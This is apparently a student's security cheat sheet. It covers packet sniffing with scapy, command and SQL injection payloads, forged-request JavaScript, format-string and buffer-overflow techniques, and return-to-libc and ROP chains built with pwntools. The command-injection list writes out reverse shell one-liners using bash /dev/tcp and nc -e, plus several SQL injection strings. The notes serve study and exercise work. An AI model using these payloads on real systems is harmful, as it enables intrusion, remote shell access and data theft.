
Primary LanguageBatchfile


Change Keyboard Layout: Settings -> Text Entry

Network Security

Find docker network interface: ifconfig / docker network

cmd = "ip a | grep | awk '{print $7}'"
IFACE = subprocess.run(cmd, shell=True, check=True, universal_newlines=True, stdout=subprocess.PIPE).stdout.strip()

Berkeley Packet Filters


from scapy.all import *
pkt = sniff(iface="ifacename", filter="src host and tcp dst port 23", prn=print_pkt)	# def print_pkt(pkt): ...
pkg = IP(dst="", src="", ttl=5)/ICMP(type=, code=, id=, seq=)/data
pkg = IP(...)/TCP(sport=, dport=, flags="", seq=, ack=)

Web Security

Command Injections

  • Wait for incoming connections: nc -lnv[k] 9090
  • Send to host: echo text > /dev/tcp/
  • Initiate reverse shell: /bin/bash -i > /dev/tcp/ 0<&1 2>&1 / nc -e /bin/bash host port
  • Delimiters to try:
    • ;
    • /n
    • &&, ||
    • ', ", `
    • $, \
  • Command substitution:
    • `whoami`
    • $(whoami)

SQL Injections

  • ' or 1=1 --
  • ', ", \
  • 1 UNION SELECT secret FROM secrets
  • 1 AND 1=0 UNION SELECT 1,2,3
  • SELECT schema_name FROM information_schema.schemata
  • SELECT table_name FROM information_schema.tables
  • Wildcards for LIKE:
    • match one: _ / ?
    • match one or more: %

HTTP Verbs

  • GET Request
<script type="text/javascript">
	window.onload = function () {
		var sendurl="/sub1/sub2/site?var1=ab&var2=cd&var3=xy";
		var Ajax=new XMLHttpRequest();
		Ajax.open("GET", sendurl, true);
  • POST Request
<script type="text/javascript">
	window.onload = function() {
		var sendurl="/action/profile/edit";
		var contest="var1=ab&var2=cd&var3=xy";
		var Ajax=new XMLHttpRequest();
		Ajax.open("POST", sendurl, true);
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");


For 0xAABBCCDD as String "\xDD\xCC\xBB\xAA" 0x1234 = 0x00001234

Useful commands

echo `python3 -c "print('\x41')"`
python3 -c "print('\x41')" | command

objdump -d -M intel binaryFile

file binaryFile
checksec binaryFile
strings binaryFile


Breakpoint: b main Adress of function: p/x functionName Content of adress: x 0x1234abcd Read "inside" adress: x/i 0x1234abcd Run with input: r < input_file

gdb-peda pattern search

pattern create 50 pat50 pattern search Pattern buffer found at: ... size (...0x28...)

dissass main

Format String

Print Hex value: %.8x Print String (takes adress as arg): %s Print empty chars: %210c Write number of printed symbols at adress: %n Use 64th argument: %64$.8x


  1. Find position of buffer (for example 64)
  2. Put adress of variable at beginning of buffer
  3. After that write "%210c%64$n", substitute 210 for decimal number of wanted hex value


  1. find out how long until you overwrite the return adress / a function call
  2. insert a pointer to the beginning of the buffer
  3. put shellcode at the beginning of the buffer

Return to Libc

  1. find adress of system(), exit() and envoirenment variable MYSHELL=/bin/sh
  2. but random stuff up to the return pointer (where EBP points to +4), then the adresses of system(), exit(), MYSHELL=/bin/sh


Print all gadgets:

from pwn import *
elf = context.binary = ELF('binaryFile')
rop = ROP(elf)

Get String Adress: r2 binaryFile -> izz -> third column

Generate ROP

from pwn import *
elf = context.binary = ELF('binaryFile')
rop = ROP(elf)
rop.call(0x1234abcd, [0x5678efab])	# call a function with the given arguments (adress_of_system, [adress_of_/bin/sh])
rop.chain()		# gives binary code without offset